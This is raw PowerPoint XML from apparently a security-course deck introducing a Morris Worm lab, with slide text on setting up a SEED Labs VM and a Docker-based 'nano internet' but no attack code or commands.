                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{593FA98E-BF08-BEAB-70C2-795E65356E87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6272463" y="4010431"/>
            <a:ext cx="2478504" cy="486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20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460C-BE1A-B2BD-8120-3C6D7C403B3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30EFCF8-B749-87AF-8B9A-B94F01C83BA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4331894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is Morris Worm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>How to demonstrate the attack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Morris Worm lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setup VM https://github.com/seed-labs/seed-labs/blob/master/manuals/vm/seedvm-manual.md</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16611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6BA5B-153F-6634-E9AC-8D08D8DC74A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1486174" y="624597"/>
            <a:ext cx="7567316" cy="5608806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{968E5978-7166-8B96-779B-E67C42DE5AB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9574831" y="820094"/>
            <a:ext cx="2039280" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A configuration file allows you to easily start, stop, and manage multiple  containers for your application's </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44BE6D64-0AFD-1E33-EFA6-0F4580EED80C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8176069" y="1671701"/>
            <a:ext cx="1398762" cy="25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54" name="Group 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14927E0C-5F36-2EAE-0193-987D99162CB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4457501" y="2093558"/>
            <a:ext cx="1743120" cy="3054960"/>
            <a:chOff x="4457501" y="2093558"/>
            <a:chExt cx="1743120" cy="3054960"/>
          </a:xfrm>
        </p:grpSpPr>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A16DAD79-E8AF-CCD2-871C-4DE339A8BAF1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6087221" y="4868438"/>
                <a:ext cx="84600" cy="208080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="45" name="Ink 44">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A16DAD79-E8AF-CCD2-871C-4DE339A8BAF1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6078581" y="4859798"/>
                  <a:ext cx="102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12F02EFE-CE58-CC22-AA01-20B80D7C9BBB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6145541" y="5020718"/>
                <a:ext cx="55080" cy="106200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="46" name="Ink 45">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12F02EFE-CE58-CC22-AA01-20B80D7C9BBB}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6136541" y="5012078"/>
                  <a:ext cx="72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44445D53-3302-A97A-A003-327440DD680D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5092541" y="3142958"/>
                <a:ext cx="995400" cy="1911240"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="49" name="Ink 48">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44445D53-3302-A97A-A003-327440DD680D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId9"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5083901" y="3133958"/>
                  <a:ext cx="1013040" cy="192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654D5C2B-1CC6-8FE5-C6D7-C98CDCCED643}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5911181" y="4940798"/>
                <a:ext cx="49680" cy="146880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="50" name="Ink 49">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{654D5C2B-1CC6-8FE5-C6D7-C98CDCCED643}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5902181" y="4932158"/>
                  <a:ext cx="67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Ink 51">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A41749B-C600-6DB7-5E8B-2BE2D4885BF1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4457501" y="2093558"/>
                <a:ext cx="1622520" cy="2975760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="52" name="Ink 51">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A41749B-C600-6DB7-5E8B-2BE2D4885BF1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId13"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4448861" y="2084558"/>
                  <a:ext cx="1640160" cy="299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Ink 52">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DF90DE9-7A9F-55CC-BC76-7E23D23F6FF0}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5381621" y="4948718"/>
                <a:ext cx="151920" cy="199800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="53" name="Ink 52">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DF90DE9-7A9F-55CC-BC76-7E23D23F6FF0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId15"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5372981" y="4940078"/>
                  <a:ext cx="169560" cy="217440"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Picture 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8803D89-96AE-9D44-2069-2F0EE3A8F6A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9339442" y="4484755"/>
            <a:ext cx="1287892" cy="975445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58" name="Straight Arrow Connector 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D11FBF83-DDB7-FF11-B1E9-018E97B44857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7996989" y="5020718"/>
            <a:ext cx="1171074" cy="279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0" name="TextBox 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB81BACE-E642-24BD-4131-79FF18A90C28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2474602" y="3376463"/>
            <a:ext cx="3197094" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All nodes are inherited from </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="TextBox 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83AA0FBF-A3F7-E705-C189-443351931BCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8062920" y="4382295"/>
            <a:ext cx="1048800" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Right Brace 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D374D5C1-68FB-6AD0-C2F2-8F7B8E15C5DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7868653" y="2021305"/>
            <a:ext cx="307416" cy="3914274"/>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29956FD9-67CC-8C2D-FD47-304070E09FF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8028701" y="1740398"/>
            <a:ext cx="531720" cy="2225160"/>
            <a:chOff x="8028701" y="1740398"/>
            <a:chExt cx="531720" cy="2225160"/>
          </a:xfrm>
        </p:grpSpPr>
        <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
          <mc:Choice Requires="p14">
            <p:contentPart p14:bwMode="auto" r:id="rId17">
              <p14:nvContentPartPr>
                <p14:cNvPr id="68" name="Ink 67">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{162237FF-B0DE-DC05-77E9-C5379F14BD3D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8028701" y="1740398"/>
                <a:ext cx="531720" cy="2220840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="68" name="Ink 67">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{162237FF-B0DE-DC05-77E9-C5379F14BD3D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId18"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8020061" y="1731398"/>
                  <a:ext cx="549360" cy="223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956E9EBA-DE3E-7955-E081-B1345714AA50}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8206181" y="3793838"/>
                <a:ext cx="150840" cy="171720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="69" name="Ink 68">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{956E9EBA-DE3E-7955-E081-B1345714AA50}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId20"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8197541" y="3784838"/>
                  <a:ext cx="168480" cy="189360"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="TextBox 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E83BE57A-7B0D-9762-8887-0DEFD87B46EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8542040" y="2723977"/>
            <a:ext cx="1548309" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>consists of</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A02312F-F52A-64EC-B0EE-E7A5CD7EB257}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1486174" y="296779"/>
            <a:ext cx="3590150" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Define a nano internet using docker </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="What is Docker? | AWS">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA86DDF5-F48D-DEB7-C68A-7931A140545C}"/>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9997" r="25610"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5156081" y="0"/>
            <a:ext cx="868320" cy="7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9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106789-8FAE-CE7F-1965-E77EAF46BFC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1450612" y="0"/>
            <a:ext cx="6102888" cy="4679903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2B6E63F-7CE1-A833-D065-0AE4E83B64C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1450612" y="4679903"/>
            <a:ext cx="6955452" cy="484551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4501CA1-67E0-3568-4284-29C6718C712A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136417" y="2421358"/>
            <a:ext cx="1187057" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hostname</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CE54937-E27B-0C48-A64A-4204971F729C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="10" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1323474" y="2605842"/>
            <a:ext cx="381468" cy="1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55AA2B1E-0AAB-FA94-DE25-ACAB9D28CE7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5594276" y="2421358"/>
            <a:ext cx="2086362" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: build configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D91127E7-FD1E-0D0A-E36D-A166853F8FE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4259179" y="2790690"/>
            <a:ext cx="133509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C741C304-35AA-CC27-08BF-9927C2D93DB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
